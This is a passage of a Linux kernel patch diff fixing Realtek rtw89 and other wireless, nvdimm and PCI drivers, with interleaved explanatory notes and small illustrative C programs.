+@@ -3209,16 +3209,16 @@ static inline struct rtw89_fw_c2h_attr *RTW89_SKB_C2H_CB(struct sk_buff *skb)
+ 	le32_get_bits(*((const __le32 *)(c2h) + 5), GENMASK(25, 24))
+ 
+ #define RTW89_GET_MAC_C2H_MCC_RCV_ACK_GROUP(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(1, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(1, 0))
+ #define RTW89_GET_MAC_C2H_MCC_RCV_ACK_H2C_FUNC(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(15, 8))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(15, 8))
+ 
+ #define RTW89_GET_MAC_C2H_MCC_REQ_ACK_GROUP(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(1, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(1, 0))
+ #define RTW89_GET_MAC_C2H_MCC_REQ_ACK_H2C_RETURN(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(7, 2))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(7, 2))
+ #define RTW89_GET_MAC_C2H_MCC_REQ_ACK_H2C_FUNC(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(15, 8))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(15, 8))
+ 
+ struct rtw89_mac_mcc_tsf_rpt {
+ 	u32 macid_x;
+@@ -3232,30 +3232,30 @@ struct rtw89_mac_mcc_tsf_rpt {
+ static_assert(sizeof(struct rtw89_mac_mcc_tsf_rpt) <= RTW89_COMPLETION_BUF_SIZE);
+ 
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_MACID_X(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(7, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(7, 0))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_MACID_Y(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(15, 8))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(15, 8))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_GROUP(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(17, 16))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(17, 16))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_TSF_LOW_X(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 1), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 3), GENMASK(31, 0))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_TSF_HIGH_X(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 4), GENMASK(31, 0))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_TSF_LOW_Y(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 3), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 5), GENMASK(31, 0))
+ #define RTW89_GET_MAC_C2H_MCC_TSF_RPT_TSF_HIGH_Y(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 4), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 6), GENMASK(31, 0))
+ 
+ #define RTW89_GET_MAC_C2H_MCC_STATUS_RPT_STATUS(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(5, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(5, 0))
+ #define RTW89_GET_MAC_C2H_MCC_STATUS_RPT_GROUP(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(7, 6))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(7, 6))
+ #define RTW89_GET_MAC_C2H_MCC_STATUS_RPT_MACID(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h)), GENMASK(15, 8))
++	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(15, 8))
+ #define RTW89_GET_MAC_C2H_MCC_STATUS_RPT_TSF_LOW(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 1), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 3), GENMASK(31, 0))
+ #define RTW89_GET_MAC_C2H_MCC_STATUS_RPT_TSF_HIGH(c2h) \
+-	le32_get_bits(*((const __le32 *)(c2h) + 2), GENMASK(31, 0))
++	le32_get_bits(*((const __le32 *)(c2h) + 4), GENMASK(31, 0))
+ 
+ #define RTW89_FW_HDR_SIZE 32
+ #define RTW89_FW_SECTION_HDR_SIZE 16
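
[Note: every accessor in the hunk above gains "+ 2": the MCC report fields sit after a two-dword C2H header, so the macros must index from the payload, not from the start of the message. A self-contained sketch of dword-indexed field extraction from a little-endian buffer; the field layout is invented for illustration.]

#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t get_le32(const uint8_t *p, int dword)
{
	uint32_t v;

	memcpy(&v, p + 4 * dword, sizeof(v));	/* alignment-safe */
	return v;	/* assumes a little-endian host, for brevity */
}

/* Extract "group" from bits 1:0 of the first payload dword,
 * skipping a two-dword header -- the same shape as the fix. */
static unsigned int get_group(const uint8_t *c2h)
{
	return get_le32(c2h, 2) & 0x3;
}

int main(void)
{
	uint8_t msg[12] = { 0 };

	msg[8] = 0x02;		/* group = 2, in payload dword 0 */
	printf("group=%u\n", get_group(msg));
	return 0;
}
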
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.c b/drivers/net/wireless/realtek/rtw89/pci.c
+index 1c4500ba777c6..0ea734c81b4f0 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.c
++++ b/drivers/net/wireless/realtek/rtw89/pci.c
+@@ -1384,7 +1384,7 @@ static int rtw89_pci_ops_tx_write(struct rtw89_dev *rtwdev, struct rtw89_core_tx
+ 	return 0;
+ }
+ 
+-static const struct rtw89_pci_bd_ram bd_ram_table[RTW89_TXCH_NUM] = {
++const struct rtw89_pci_bd_ram rtw89_bd_ram_table_dual[RTW89_TXCH_NUM] = {
+ 	[RTW89_TXCH_ACH0] = {.start_idx = 0,  .max_num = 5, .min_num = 2},
+ 	[RTW89_TXCH_ACH1] = {.start_idx = 5,  .max_num = 5, .min_num = 2},
+ 	[RTW89_TXCH_ACH2] = {.start_idx = 10, .max_num = 5, .min_num = 2},
+@@ -1399,11 +1399,24 @@ static const struct rtw89_pci_bd_ram bd_ram_table[RTW89_TXCH_NUM] = {
+ 	[RTW89_TXCH_CH11] = {.start_idx = 55, .max_num = 5, .min_num = 1},
+ 	[RTW89_TXCH_CH12] = {.start_idx = 60, .max_num = 4, .min_num = 1},
+ };
++EXPORT_SYMBOL(rtw89_bd_ram_table_dual);
++
++const struct rtw89_pci_bd_ram rtw89_bd_ram_table_single[RTW89_TXCH_NUM] = {
++	[RTW89_TXCH_ACH0] = {.start_idx = 0,  .max_num = 5, .min_num = 2},
++	[RTW89_TXCH_ACH1] = {.start_idx = 5,  .max_num = 5, .min_num = 2},
++	[RTW89_TXCH_ACH2] = {.start_idx = 10, .max_num = 5, .min_num = 2},
++	[RTW89_TXCH_ACH3] = {.start_idx = 15, .max_num = 5, .min_num = 2},
++	[RTW89_TXCH_CH8]  = {.start_idx = 20, .max_num = 4, .min_num = 1},
++	[RTW89_TXCH_CH9]  = {.start_idx = 24, .max_num = 4, .min_num = 1},
++	[RTW89_TXCH_CH12] = {.start_idx = 28, .max_num = 4, .min_num = 1},
++};
++EXPORT_SYMBOL(rtw89_bd_ram_table_single);
+ 
+ static void rtw89_pci_reset_trx_rings(struct rtw89_dev *rtwdev)
+ {
+ 	struct rtw89_pci *rtwpci = (struct rtw89_pci *)rtwdev->priv;
+ 	const struct rtw89_pci_info *info = rtwdev->pci_info;
++	const struct rtw89_pci_bd_ram *bd_ram_table = *info->bd_ram_table;
+ 	struct rtw89_pci_tx_ring *tx_ring;
+ 	struct rtw89_pci_rx_ring *rx_ring;
+ 	struct rtw89_pci_dma_ring *bd_ring;
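
[Note: bd_ram_table is declared as a pointer to a fixed-size array, so each chip's info struct can point at either the dual- or single-queue table, and the reset path dereferences it with *info->bd_ram_table. A small demo of that C idiom, with invented values.]

#include <stdio.h>

#define NCH 3

struct bd_ram { unsigned char start, max, min; };

static const struct bd_ram table_dual[NCH]   = { {0, 5, 2}, {5, 5, 2}, {10, 5, 2} };
static const struct bd_ram table_single[NCH] = { {0, 5, 2}, {5, 4, 1}, {9, 4, 1} };

struct chip_info {
	/* pointer to an array of exactly NCH entries */
	const struct bd_ram (*bd_ram_table)[NCH];
};

int main(void)
{
	struct chip_info info = { .bd_ram_table = &table_single };
	const struct bd_ram *tbl = *info.bd_ram_table;	/* as in the hunk */

	(void)table_dual;
	printf("ch1 start=%u\n", tbl[1].start);
	return 0;
}
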
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.h b/drivers/net/wireless/realtek/rtw89/pci.h
+index 7d033501d4d95..1e19740db8c54 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.h
++++ b/drivers/net/wireless/realtek/rtw89/pci.h
+@@ -750,6 +750,12 @@ struct rtw89_pci_ch_dma_addr_set {
+ 	struct rtw89_pci_ch_dma_addr rx[RTW89_RXCH_NUM];
+ };
+ 
++struct rtw89_pci_bd_ram {
++	u8 start_idx;
++	u8 max_num;
++	u8 min_num;
++};
++
+ struct rtw89_pci_info {
+ 	enum mac_ax_bd_trunc_mode txbd_trunc_mode;
+ 	enum mac_ax_bd_trunc_mode rxbd_trunc_mode;
+@@ -785,6 +791,7 @@ struct rtw89_pci_info {
+ 	u32 tx_dma_ch_mask;
+ 	const struct rtw89_pci_bd_idx_addr *bd_idx_addr_low_power;
+ 	const struct rtw89_pci_ch_dma_addr_set *dma_addr_set;
++	const struct rtw89_pci_bd_ram (*bd_ram_table)[RTW89_TXCH_NUM];
+ 
+ 	int (*ltr_set)(struct rtw89_dev *rtwdev, bool en);
+ 	u32 (*fill_txaddr_info)(struct rtw89_dev *rtwdev,
+@@ -798,12 +805,6 @@ struct rtw89_pci_info {
+ 				struct rtw89_pci_isrs *isrs);
+ };
+ 
+-struct rtw89_pci_bd_ram {
+-	u8 start_idx;
+-	u8 max_num;
+-	u8 min_num;
+-};
+-
+ struct rtw89_pci_tx_data {
+ 	dma_addr_t dma;
+ };
+@@ -1057,6 +1058,8 @@ static inline bool rtw89_pci_ltr_is_err_reg_val(u32 val)
+ extern const struct dev_pm_ops rtw89_pm_ops;
+ extern const struct rtw89_pci_ch_dma_addr_set rtw89_pci_ch_dma_addr_set;
+ extern const struct rtw89_pci_ch_dma_addr_set rtw89_pci_ch_dma_addr_set_v1;
++extern const struct rtw89_pci_bd_ram rtw89_bd_ram_table_dual[RTW89_TXCH_NUM];
++extern const struct rtw89_pci_bd_ram rtw89_bd_ram_table_single[RTW89_TXCH_NUM];
+ 
+ struct pci_device_id;
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/reg.h b/drivers/net/wireless/realtek/rtw89/reg.h
+index 5324e645728bb..ca6f6c3e63095 100644
+--- a/drivers/net/wireless/realtek/rtw89/reg.h
++++ b/drivers/net/wireless/realtek/rtw89/reg.h
+@@ -3671,6 +3671,8 @@
+ #define RR_TXRSV_GAPK BIT(19)
+ #define RR_BIAS 0x5e
+ #define RR_BIAS_GAPK BIT(19)
++#define RR_TXAC 0x5f
++#define RR_TXAC_IQG GENMASK(3, 0)
+ #define RR_BIASA 0x60
+ #define RR_BIASA_TXG GENMASK(15, 12)
+ #define RR_BIASA_TXA GENMASK(19, 16)
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852ae.c b/drivers/net/wireless/realtek/rtw89/rtw8852ae.c
+index 0cd8c0c44d19d..d835a44a1d0d0 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852ae.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852ae.c
+@@ -44,6 +44,7 @@ static const struct rtw89_pci_info rtw8852a_pci_info = {
+ 	.tx_dma_ch_mask		= 0,
+ 	.bd_idx_addr_low_power	= NULL,
+ 	.dma_addr_set		= &rtw89_pci_ch_dma_addr_set,
++	.bd_ram_table		= &rtw89_bd_ram_table_dual,
+ 
+ 	.ltr_set		= rtw89_pci_ltr_set,
+ 	.fill_txaddr_info	= rtw89_pci_fill_txaddr_info,
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852be.c b/drivers/net/wireless/realtek/rtw89/rtw8852be.c
+index 0ef2ca8efeb0e..ecf39d2d9f81f 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852be.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852be.c
+@@ -46,6 +46,7 @@ static const struct rtw89_pci_info rtw8852b_pci_info = {
+ 				  BIT(RTW89_TXCH_CH10) | BIT(RTW89_TXCH_CH11),
+ 	.bd_idx_addr_low_power	= NULL,
+ 	.dma_addr_set		= &rtw89_pci_ch_dma_addr_set,
++	.bd_ram_table		= &rtw89_bd_ram_table_single,
+ 
+ 	.ltr_set		= rtw89_pci_ltr_set,
+ 	.fill_txaddr_info	= rtw89_pci_fill_txaddr_info,
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c b/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
+index 60cd676fe22c9..f3a07b0e672f7 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
+@@ -337,7 +337,7 @@ static void _dack_reload_by_path(struct rtw89_dev *rtwdev,
+ 		(dack->dadck_d[path][index] << 14);
+ 	addr = 0xc210 + offset;
+ 	rtw89_phy_write32(rtwdev, addr, val32);
+-	rtw89_phy_write32_set(rtwdev, addr, BIT(1));
++	rtw89_phy_write32_set(rtwdev, addr, BIT(0));
+ }
+ 
+ static void _dack_reload(struct rtw89_dev *rtwdev, enum rtw89_rf_path path)
+@@ -1872,12 +1872,11 @@ static void _dpk_rf_setting(struct rtw89_dev *rtwdev, u8 gain,
+ 			       0x50101 | BIT(rtwdev->dbcc_en));
+ 		rtw89_write_rf(rtwdev, path, RR_MOD_V1, RR_MOD_MASK, RF_DPK);
+ 
+-		if (dpk->bp[path][kidx].band == RTW89_BAND_6G && dpk->bp[path][kidx].ch >= 161) {
++		if (dpk->bp[path][kidx].band == RTW89_BAND_6G && dpk->bp[path][kidx].ch >= 161)
+ 			rtw89_write_rf(rtwdev, path, RR_IQGEN, RR_IQGEN_BIAS, 0x8);
+-			rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
+-		} else {
+-			rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
+-		}
++
++		rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
++		rtw89_write_rf(rtwdev, path, RR_TXAC, RR_TXAC_IQG, 0x8);
+ 
+ 		rtw89_write_rf(rtwdev, path, RR_RXA2, RR_RXA2_ATT, 0x0);
+ 		rtw89_write_rf(rtwdev, path, RR_TXIQK, RR_TXIQK_ATT2, 0x3);
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852ce.c b/drivers/net/wireless/realtek/rtw89/rtw8852ce.c
+index 35901f64d17de..80490a5437df6 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852ce.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852ce.c
+@@ -53,6 +53,7 @@ static const struct rtw89_pci_info rtw8852c_pci_info = {
+ 	.tx_dma_ch_mask		= 0,
+ 	.bd_idx_addr_low_power	= &rtw8852c_bd_idx_addr_low_power,
+ 	.dma_addr_set		= &rtw89_pci_ch_dma_addr_set_v1,
++	.bd_ram_table		= &rtw89_bd_ram_table_dual,
+ 
+ 	.ltr_set		= rtw89_pci_ltr_set_v1,
+ 	.fill_txaddr_info	= rtw89_pci_fill_txaddr_info_v1,
+diff --git a/drivers/net/wireless/rsi/rsi_91x_coex.c b/drivers/net/wireless/rsi/rsi_91x_coex.c
+index 8a3d86897ea8e..45ac9371f2621 100644
+--- a/drivers/net/wireless/rsi/rsi_91x_coex.c
++++ b/drivers/net/wireless/rsi/rsi_91x_coex.c
+@@ -160,6 +160,7 @@ int rsi_coex_attach(struct rsi_common *common)
+ 			       rsi_coex_scheduler_thread,
+ 			       "Coex-Tx-Thread")) {
+ 		rsi_dbg(ERR_ZONE, "%s: Unable to init tx thrd\n", __func__);
++		kfree(coex_cb);
+ 		return -EINVAL;
+ 	}
+ 	return 0;
+diff --git a/drivers/net/wireless/wl3501_cs.c b/drivers/net/wireless/wl3501_cs.c
+index 1b532e00a56fb..7fb2f95134760 100644
+--- a/drivers/net/wireless/wl3501_cs.c
++++ b/drivers/net/wireless/wl3501_cs.c
+@@ -1328,7 +1328,7 @@ static netdev_tx_t wl3501_hard_start_xmit(struct sk_buff *skb,
+ 	} else {
+ 		++dev->stats.tx_packets;
+ 		dev->stats.tx_bytes += skb->len;
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 
+ 		if (this->tx_buffer_cnt < 2)
+ 			netif_stop_queue(dev);
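
[Note: wl3501_hard_start_xmit() can run with interrupts disabled, where plain kfree_skb() is not allowed; dev_kfree_skb_irq() instead queues the skb and frees it later from softirq context. There is no direct userspace equivalent, so the following is only a crude illustration of the defer-free idea, not the kernel mechanism.]

#include <stdlib.h>

#define MAX_DEFER 16

static void *defer_q[MAX_DEFER];
static int defer_n;

static void free_irq_safe(void *p)	/* dev_kfree_skb_irq() analog */
{
	if (defer_n < MAX_DEFER)
		defer_q[defer_n++] = p;	/* just record it, free later */
}

static void run_softirq(void)		/* later, in a safe context */
{
	while (defer_n)
		free(defer_q[--defer_n]);
}

int main(void)
{
	free_irq_safe(malloc(32));
	run_softirq();
	return 0;
}
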
+diff --git a/drivers/nvdimm/bus.c b/drivers/nvdimm/bus.c
+index b38d0355b0ac3..5ad49056921b5 100644
+--- a/drivers/nvdimm/bus.c
++++ b/drivers/nvdimm/bus.c
+@@ -508,7 +508,7 @@ static void nd_async_device_unregister(void *d, async_cookie_t cookie)
+ 	put_device(dev);
+ }
+ 
+-void nd_device_register(struct device *dev)
++static void __nd_device_register(struct device *dev, bool sync)
+ {
+ 	if (!dev)
+ 		return;
+@@ -531,11 +531,24 @@ void nd_device_register(struct device *dev)
+ 	}
+ 	get_device(dev);
+ 
+-	async_schedule_dev_domain(nd_async_device_register, dev,
+-				  &nd_async_domain);
++	if (sync)
++		nd_async_device_register(dev, 0);
++	else
++		async_schedule_dev_domain(nd_async_device_register, dev,
++					  &nd_async_domain);
++}
++
++void nd_device_register(struct device *dev)
++{
++	__nd_device_register(dev, false);
+ }
+ EXPORT_SYMBOL(nd_device_register);
+ 
++void nd_device_register_sync(struct device *dev)
++{
++	__nd_device_register(dev, true);
++}
++
+ void nd_device_unregister(struct device *dev, enum nd_async_mode mode)
+ {
+ 	bool killed;
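
[Note: the nvdimm refactor funnels both entry points through one helper with a "sync" flag: nd_device_register() keeps the async_schedule_dev_domain() behaviour, while the new nd_device_register_sync() runs the work function inline. A sketch of the flag-dispatch shape, with a thread loosely standing in for the async domain.]

/* build: cc demo.c -lpthread */
#include <pthread.h>
#include <stdio.h>

static void *do_register(void *dev)	/* nd_async_device_register() analog */
{
	printf("registering %s\n", (char *)dev);
	return NULL;
}

static void __register(char *dev, int sync)
{
	pthread_t t;

	if (sync) {
		do_register(dev);		/* run inline, no async domain */
	} else {
		pthread_create(&t, NULL, do_register, dev);
		pthread_join(&t, NULL);		/* the kernel waits via nd_synchronize() */
	}
}

int main(void)
{
	__register("dimm0", 0);	/* nd_device_register() */
	__register("dimm1", 1);	/* nd_device_register_sync() */
	return 0;
}
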
+diff --git a/drivers/nvdimm/dimm_devs.c b/drivers/nvdimm/dimm_devs.c
+index 1fc081dcf6315..6d3b03a9fa02a 100644
+--- a/drivers/nvdimm/dimm_devs.c
++++ b/drivers/nvdimm/dimm_devs.c
+@@ -624,7 +624,10 @@ struct nvdimm *__nvdimm_create(struct nvdimm_bus *nvdimm_bus,
+ 	nvdimm->sec.ext_flags = nvdimm_security_flags(nvdimm, NVDIMM_MASTER);
+ 	device_initialize(dev);
+ 	lockdep_set_class(&dev->mutex, &nvdimm_key);
+-	nd_device_register(dev);
++	if (test_bit(NDD_REGISTER_SYNC, &flags))
++		nd_device_register_sync(dev);
++	else
++		nd_device_register(dev);
+ 
+ 	return nvdimm;
+ }
+diff --git a/drivers/nvdimm/nd-core.h b/drivers/nvdimm/nd-core.h
+index cc86ee09d7c08..845408f106556 100644
+--- a/drivers/nvdimm/nd-core.h
++++ b/drivers/nvdimm/nd-core.h
+@@ -107,6 +107,7 @@ int nvdimm_bus_create_ndctl(struct nvdimm_bus *nvdimm_bus);
+ void nvdimm_bus_destroy_ndctl(struct nvdimm_bus *nvdimm_bus);
+ void nd_synchronize(void);
+ void nd_device_register(struct device *dev);
++void nd_device_register_sync(struct device *dev);
+ struct nd_label_id;
+ char *nd_label_gen_id(struct nd_label_id *label_id, const uuid_t *uuid,
+ 		      u32 flags);
+diff --git a/drivers/opp/debugfs.c b/drivers/opp/debugfs.c
+index 96a30a032c5f9..2c7fb683441ef 100644
+--- a/drivers/opp/debugfs.c
++++ b/drivers/opp/debugfs.c
+@@ -235,7 +235,7 @@ static void opp_migrate_dentry(struct opp_device *opp_dev,
+ 
+ 	dentry = debugfs_rename(rootdir, opp_dev->dentry, rootdir,
+ 				opp_table->dentry_name);
+-	if (!dentry) {
++	if (IS_ERR(dentry)) {
+ 		dev_err(dev, "%s: Failed to rename link from: %s to %s\n",
+ 			__func__, dev_name(opp_dev->dev), dev_name(dev));
+ 		return;
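
[Note: debugfs_rename() never returns NULL on failure; like most debugfs calls it returns an ERR_PTR-encoded errno, so the old "!dentry" test could never fire. A standalone sketch of the ERR_PTR convention, with the kernel macros reimplemented for userspace.]

#include <stdio.h>

#define MAX_ERRNO	4095
#define ERR_PTR(err)	((void *)(long)(err))
#define IS_ERR(ptr)	((unsigned long)(ptr) >= (unsigned long)-MAX_ERRNO)
#define PTR_ERR(ptr)	((long)(ptr))

static void *do_rename(int fail)
{
	return fail ? ERR_PTR(-2 /* -ENOENT */) : (void *)0x1000;
}

int main(void)
{
	void *d = do_rename(1);

	if (IS_ERR(d))			/* the correct check */
		printf("rename failed: %ld\n", PTR_ERR(d));
	if (!d)				/* the old check: never true here */
		printf("unreachable for ERR_PTR returns\n");
	return 0;
}
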
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index 77e5dc7b88ad4..7e23c74fb4230 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -1534,8 +1534,19 @@ err_deinit:
+ 	return ret;
+ }
+ 
++static void qcom_pcie_host_deinit(struct dw_pcie_rp *pp)
++{
++	struct dw_pcie *pci = to_dw_pcie_from_pp(pp);
++	struct qcom_pcie *pcie = to_qcom_pcie(pci);
++
++	qcom_ep_reset_assert(pcie);
++	phy_power_off(pcie->phy);
++	pcie->cfg->ops->deinit(pcie);
++}
++
+ static const struct dw_pcie_host_ops qcom_pcie_dw_ops = {
+-	.host_init = qcom_pcie_host_init,
++	.host_init	= qcom_pcie_host_init,
++	.host_deinit	= qcom_pcie_host_deinit,
+ };
+ 
+ /* Qcom IP rev.: 2.1.0	Synopsys IP rev.: 4.01a */
+diff --git a/drivers/pci/controller/pcie-mt7621.c b/drivers/pci/controller/pcie-mt7621.c
+index ee7aad09d6277..63a5f4463a9f6 100644
+--- a/drivers/pci/controller/pcie-mt7621.c
++++ b/drivers/pci/controller/pcie-mt7621.c
+@@ -60,6 +60,7 @@
+ #define PCIE_PORT_LINKUP		BIT(0)
+ #define PCIE_PORT_CNT			3
+ 
++#define INIT_PORTS_DELAY_MS		100
+ #define PERST_DELAY_MS			100
+ 
+ /**
+@@ -369,6 +370,7 @@ static int mt7621_pcie_init_ports(struct mt7621_pcie *pcie)
+ 		}
+ 	}
+ 
++	msleep(INIT_PORTS_DELAY_MS);
+ 	mt7621_pcie_reset_ep_deassert(pcie);
+ 
+ 	tmp = NULL;
+diff --git a/drivers/pci/endpoint/functions/pci-epf-vntb.c b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+index 04698e7995a54..b7c7a8af99f4f 100644
+--- a/drivers/pci/endpoint/functions/pci-epf-vntb.c
++++ b/drivers/pci/endpoint/functions/pci-epf-vntb.c
+@@ -652,6 +652,7 @@ err_alloc_mem:
+ /**
+  * epf_ntb_mw_bar_clear() - Clear Memory window BARs
+  * @ntb: NTB device that facilitates communication between HOST and VHOST
++ * @num_mws: the number of Memory window BARs to be cleared
+  */
+ static void epf_ntb_mw_bar_clear(struct epf_ntb *ntb, int num_mws)
+ {
+diff --git a/drivers/pci/iov.c b/drivers/pci/iov.c
+index 952217572113c..b2e8322755c17 100644
+--- a/drivers/pci/iov.c
++++ b/drivers/pci/iov.c
+@@ -14,7 +14,7 @@
+ #include <linux/delay.h>
+ #include "pci.h"
+ 
+-#define VIRTFN_ID_LEN	16
++#define VIRTFN_ID_LEN	17	/* "virtfn%u\0" for 2^32 - 1 */
+ 
+ int pci_iov_virtfn_bus(struct pci_dev *dev, int vf_id)
+ {
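
[Note: the old 16-byte buffer was one short for the worst case: "virtfn" is 6 characters, a u32 prints as up to 10 digits (4294967295), and the NUL terminator adds one, for 17 bytes total. A quick check:]

#include <stdio.h>

int main(void)
{
	char buf[17];
	int n = snprintf(buf, sizeof(buf), "virtfn%u", 4294967295u);

	/* 6 + 10 = 16 characters, plus NUL -> 17 bytes */
	printf("needs %d chars + NUL = %d bytes\n", n, n + 1);
	return 0;
}
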
+diff --git a/drivers/pci/pci-driver.c b/drivers/pci/pci-driver.c
+index a2ceeacc33eb6..7a19f11daca3a 100644
+--- a/drivers/pci/pci-driver.c
++++ b/drivers/pci/pci-driver.c
+@@ -572,7 +572,7 @@ static void pci_pm_default_resume_early(struct pci_dev *pci_dev)
+ 
+ static void pci_pm_bridge_power_up_actions(struct pci_dev *pci_dev)
+ {
+-	pci_bridge_wait_for_secondary_bus(pci_dev);
++	pci_bridge_wait_for_secondary_bus(pci_dev, "resume", PCI_RESET_WAIT);
+ 	/*
+ 	 * When powering on a bridge from D3cold, the whole hierarchy may be
+ 	 * powered on into D0uninitialized state, resume them to give them a
+diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
+index 5641786bd0206..da748247061d2 100644
+--- a/drivers/pci/pci.c
++++ b/drivers/pci/pci.c
+@@ -167,9 +167,6 @@ static int __init pcie_port_pm_setup(char *str)
+ }
+ __setup("pcie_port_pm=", pcie_port_pm_setup);
+ 
+-/* Time to wait after a reset for device to become responsive */
+-#define PCIE_RESET_READY_POLL_MS 60000
+-
+ /**
+  * pci_bus_max_busnr - returns maximum PCI bus number of given bus' children
+  * @bus: pointer to PCI bus structure to search
+@@ -1174,7 +1171,7 @@ static int pci_dev_wait(struct pci_dev *dev, char *reset_type, int timeout)
+ 			return -ENOTTY;
+ 		}
+ 
+-		if (delay > 1000)
++		if (delay > PCI_RESET_WAIT)
+ 			pci_info(dev, "not ready %dms after %s; waiting\n",
+ 				 delay - 1, reset_type);
+ 
+@@ -1183,7 +1180,7 @@ static int pci_dev_wait(struct pci_dev *dev, char *reset_type, int timeout)
+ 		pci_read_config_dword(dev, PCI_COMMAND, &id);
+ 	}
+ 
+-	if (delay > 1000)
++	if (delay > PCI_RESET_WAIT)
+ 		pci_info(dev, "ready %dms after %s\n", delay - 1,
+ 			 reset_type);
+ 
+@@ -4941,24 +4938,31 @@ static int pci_bus_max_d3cold_delay(const struct pci_bus *bus)
+ /**
+  * pci_bridge_wait_for_secondary_bus - Wait for secondary bus to be accessible
+  * @dev: PCI bridge
++ * @reset_type: reset type in human-readable form
++ * @timeout: maximum time to wait for devices on secondary bus (milliseconds)
+  *
+  * Handle necessary delays before access to the devices on the secondary
+- * side of the bridge are permitted after D3cold to D0 transition.
++ * side of the bridge are permitted after D3cold to D0 transition
++ * or Conventional Reset.
+  *
+  * For PCIe this means the delays in PCIe 5.0 section 6.6.1. For
+  * conventional PCI it means Tpvrh + Trhfa specified in PCI 3.0 section
+  * 4.3.2.
++ *
++ * Return 0 on success or -ENOTTY if the first device on the secondary bus
++ * failed to become accessible.
+  */
+-void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
++int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
++				      int timeout)
+ {
+ 	struct pci_dev *child;
+ 	int delay;
+ 
+ 	if (pci_dev_is_disconnected(dev))
+-		return;
++		return 0;
+ 
+-	if (!pci_is_bridge(dev) || !dev->bridge_d3)
+-		return;
++	if (!pci_is_bridge(dev))
++		return 0;
+ 
+ 	down_read(&pci_bus_sem);
+ 
+@@ -4970,14 +4974,14 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 	 */
+ 	if (!dev->subordinate || list_empty(&dev->subordinate->devices)) {
+ 		up_read(&pci_bus_sem);
+-		return;
++		return 0;
+ 	}
+ 
+ 	/* Take d3cold_delay requirements into account */
+ 	delay = pci_bus_max_d3cold_delay(dev->subordinate);
+ 	if (!delay) {
+ 		up_read(&pci_bus_sem);
+-		return;
++		return 0;
+ 	}
+ 
+ 	child = list_first_entry(&dev->subordinate->devices, struct pci_dev,
+@@ -4986,14 +4990,12 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 
+ 	/*
